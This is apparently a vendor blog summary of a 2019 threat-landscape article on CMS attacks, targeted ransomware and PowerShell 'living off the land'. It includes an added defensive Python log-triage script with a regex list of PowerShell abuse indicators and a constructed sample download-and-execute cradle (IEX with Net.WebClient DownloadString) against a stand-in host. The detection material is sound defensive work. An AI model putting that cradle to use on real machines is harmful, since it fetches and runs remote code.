This is a summary of an article written for Canadian Security by Fortinet’s Global Security Strategist, Derek Manky. The entire article can be accessed here.
Fortinet regularly releases global Threat Landscape Reports, which take stock of billions of live threat events, collected from millions of devices and analyzed by our FortiGuard Labs team. At its core, the report is meant to answer the simple question of, “is it getting better or worse out there?” While the answer is complicated, here are a few trends that need to be monitored:
Personally identifiable information (PII) collected from social media sites is often used by cybercriminals for phishing and spearphishing attacks. But that is only part of the problem. The websites run by many organizations rely on content management systems (CMS) and related development frameworks that are also vulnerable.
While the dominant CMS system, WordPress, has been targeted for years, attacks have begun to move to lesser-known CMS systems. Attacks range from simply vandalizing a website and impacting a company’s brand and reputation, to stealing or compromising mailing lists and data from forums, media galleries, and online stores and shopping carts, to using a compromised website as a launching pad to attack internal network resources or infect visitors to the site.
Multiple ransomware attacks in recent months indicate it is increasingly being customized for high-value targets, often to provide the attacker with privileged access to the network. LockerGoga is an example of an attack conducted in multiple stages, the first being a thorough reconnaissance of the defenses in place at the sites being targeted. In one high-impact attack, attackers were able to predetermine that obfuscation and evasion techniques were unnecessary, as the malware would not be easily detected by existing defenses.
It’s critical that businesses take steps to protect against ransomware by ensuring consistent patching and backup priorities are maintained, including storing backups off-network, regularly testing them for malware, and dry runs of system restoration to ensure the process is rapid.
Living off the Land
Attackers are increasingly using tools pre-installed on targeted systems to carry out their activities. This is known as “living off the land,” and enables hackers to hide their attacks behind what appears to be normal, everyday processes, making them more challenging to identify. And because many of these tools include privileged access, they can also be harder to stop.
“PowerShell is arguably one of the most popular tools used by IT teams for many reasons. It comes pre-installed on Windows machines and can interact directly with the .NET Framework. It has also become quite popular among cybercriminals. We’ve tracked adversaries using PowerShell in campaigns to deploy numerous malware, including TrickBot and Emotet banking Trojans. PowerShell, of course, is not the only one. There are other popular utilities that enable attackers to escalate privileges, move laterally across an environment, and install malicious payloads on other systems.”
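Because PowerShell is legitimately used by administrators, the defensive answer is not to block it but to log process creation and script blocks and triage them for the hallmarks of misuse. The following is an added example for this summary, not Fortinet's or the article's code: it scores constructed process-creation records (loosely modelled on Sysmon Event ID 1 fields, with constructed paths and a constructed sample.invalid URL) and decodes an `-EncodedCommand` payload so the hidden script is scanned as well.

```python
"""Triage process-creation logs for PowerShell living-off-the-land abuse.
Added example, not Fortinet's or the article's code; log records below are
constructed, loosely modelled on Sysmon Event ID 1 fields."""
import base64
import re

# Weighted indicators defenders commonly alert on for PowerShell misuse.
INDICATORS = {
    r"-e(?:c|nc|ncodedcommand)?\b": 3,   # -EncodedCommand and its prefixes
    r"-w(?:indowstyle)?\s+hidden": 2,    # console hidden from the user
    r"-nop(?:rofile)?\b": 1,
    r"-ex(?:ecutionpolicy)?\s+bypass": 2,
    r"\b(?:iex|invoke-expression)\b": 3,  # execute a string in memory
    r"downloadstring|downloadfile|net\.webclient|invoke-webrequest": 3,
}
ENC_ARG = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -EncodedCommand, or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command(cmdline):
    # Scan the raw command line plus the decoded script, if there is one.
    text = cmdline + " " + (decode_encoded_command(cmdline) or "")
    hits = [p for p in INDICATORS if re.search(p, text, re.I)]
    return sum(INDICATORS[p] for p in hits), hits

def triage(log_lines, threshold=4):
    # Yield (ProcessId, score, hits) for PowerShell events at or over threshold.
    alerts = []
    for line in log_lines:
        ev = dict(kv.split("=", 1) for kv in line.split(" | "))
        if "powershell" not in ev.get("Image", "").lower():
            continue
        score, hits = score_command(ev["CommandLine"])
        if score >= threshold:
            alerts.append((ev["ProcessId"], score, hits))
    return alerts

# Constructed samples: a routine admin command, a hidden encoded cradle, noise.
SUSPICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://sample.invalid/a')"
ENCODED = base64.b64encode(SUSPICIOUS_SCRIPT.encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LOG = [
    f"Image={PS} | CommandLine=powershell.exe Get-Service -Name Spooler | ProcessId=1001",
    f"Image={PS} | CommandLine=powershell.exe -nop -w hidden -enc {ENCODED} | ProcessId=1002",
    r"Image=C:\Windows\System32\notepad.exe | CommandLine=notepad.exe notes.txt | ProcessId=1003",
]
```

Running `triage(SAMPLE_LOG)` flags only process 1002, because the benign admin invocation scores zero and the decoded script contributes the in-memory execution and download indicators that the raw command line hides.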
What You Can Do
Watch for attacks and expect them to come in waves. Cyberattacks initiated by different cybercriminals tend to occur in clusters. It is therefore critical that threat intelligence and response systems understand and focus on those systems and functions currently being targeted by cybercriminals.
Prioritize cyber hygiene. Zero day attacks are rare because they are difficult to develop. Instead, attackers target known vulnerabilities for which a patch is readily available, trusting that most companies are lax in their patching and updating protocols. You need to identify every connected asset on your network, immediately patch those with vulnerabilities, replace those that can no longer be updated, and segment those devices that can’t be easily patched.
“Finally, organizations need to step back and rethink their security—especially if they have been engaged in digital transformation efforts. The first step is to identify and then engineer out as many points of weakness as possible. This includes a proactive inventory of devices, granular access control and dynamic network segmentation. Next, develop a proactive and integrated security approach that provides consistent protection across your entire distributed environment. In this way, you can better defend your entire network environment—from IoT devices and the mobile edge, the network core, the new WAN edge and out to multi-cloud environments—at speed and scale.”
Cyber threats are unlikely to ever stop. Instead, that reality needs to be woven into every new infrastructure or technology initiative begun by your organization. This requires security to operate in an integrated and collaborative fashion to keep adversaries at bay.
This is a summary of an article written for Canadian Security entitled, New global threat report underscores importance of refreshing cyber hygiene, written by Fortinet’s Global Security Strategist, Derek Manky, and published on the Canadian Security website on May 30, 2019.
Read more about the latest cybersecurity threat trends and the evolving threat landscape in our latest Quarterly Threat Landscape Report.